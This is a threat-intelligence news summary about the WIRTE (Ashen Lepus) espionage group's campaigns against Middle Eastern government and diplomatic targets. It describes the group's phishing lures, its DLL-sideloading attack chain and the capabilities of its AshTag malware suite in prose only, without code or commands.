WIRTE Expands Mideast Espionage with AshTag and AshenLoader

Overview
WIRTE, tracked by Unit 42 as Ashen Lepus, has run a persistent espionage campaign against government and diplomatic entities across the Middle East since at least 2018. Since 2020, the group has deployed a previously undocumented malware suite dubbed AshTag, delivered via AshenLoader DLL sideloading. Recent samples show expansion to Oman and Morocco, beyond earlier activity in the Palestinian Authority, Jordan, Iraq, Saudi Arabia, and Egypt.

Scope and persistence

• Numerous unique phishing lures across the region suggest a broad, ongoing campaign focused on government and diplomatic targets
• More than a dozen entities have been targeted; the true number is likely higher
• Activity continued through the Israel–Hamas conflict and after the October 2025 Gaza ceasefire, with new malware variants and hands-on operations observed

Attribution and ecosystem links

• WIRTE overlaps with the Gaza Cyber Gang (aka Blackstem, Extreme Jackal, Molerats, TA402), sharing code and development resources while operating semi-independently
• Cybereason links Molerats and APT-C-23 (Arid Viper/Desert Varnish/Renegade Jackal) to Hamas’s cyberwarfare division
• Check Point (Nov 2024) tied the group to destructive attacks on Israeli entities using the SameCoin wiper, highlighting dual espionage and sabotage capability

Targeting and lures

• Phishing themes are aligned with regional geopolitics
• Recent rise in Turkey-related lures (e.g., “Partnership agreement between Morocco and Turkey,” “Draft resolutions concerning the State of Palestine”) indicates potential new focus on Turkey

Attack chain at a glance

1. Phishing email delivers a benign-looking PDF decoy that prompts download of a RAR archive from a file-sharing service
2. Opening the archive launches a renamed legitimate binary that sideloads a malicious DLL (AshenLoader)
3. AshenLoader opens the decoy PDF to maintain cover, then contacts an external server to fetch a legitimate executable and AshenStager (stagerx64)
4. AshenStager is sideloaded to load the malware suite in memory, minimizing forensic artifacts

Malware toolkit

• AshenLoader: Malicious DLL used via DLL sideloading to initiate the chain and fetch additional components
• AshenStager (stagerx64): Sideloaded component that launches payloads in memory
• AshTag: A modular .NET backdoor masquerading as a VisualServer utility
  • Uses an AshenOrchestrator for communications and in-memory payload execution

AshTag capabilities

• Persistence and process management
• Update and removal
• Screen capture
• File exploration and management
• System fingerprinting

Hands-on data theft

• In at least one case, the attackers accessed a compromised host, staged diplomacy-related documents in C:\Users\Public (sourced from the victim’s email inbox), and exfiltrated them to attacker infrastructure using Rclone
• Data theft is likely across the broader victim set, especially where advanced detection is lacking

Bottom line
Ashen Lepus (WIRTE) remains an active and resilient espionage actor focused on Middle Eastern government and diplomatic targets. The group’s continued operations through regional conflict, expanded targeting, and evolving malware lineup (AshenLoader, AshenStager, AshTag) underscore a sustained priority on intelligence collection.

Source: The Hacker News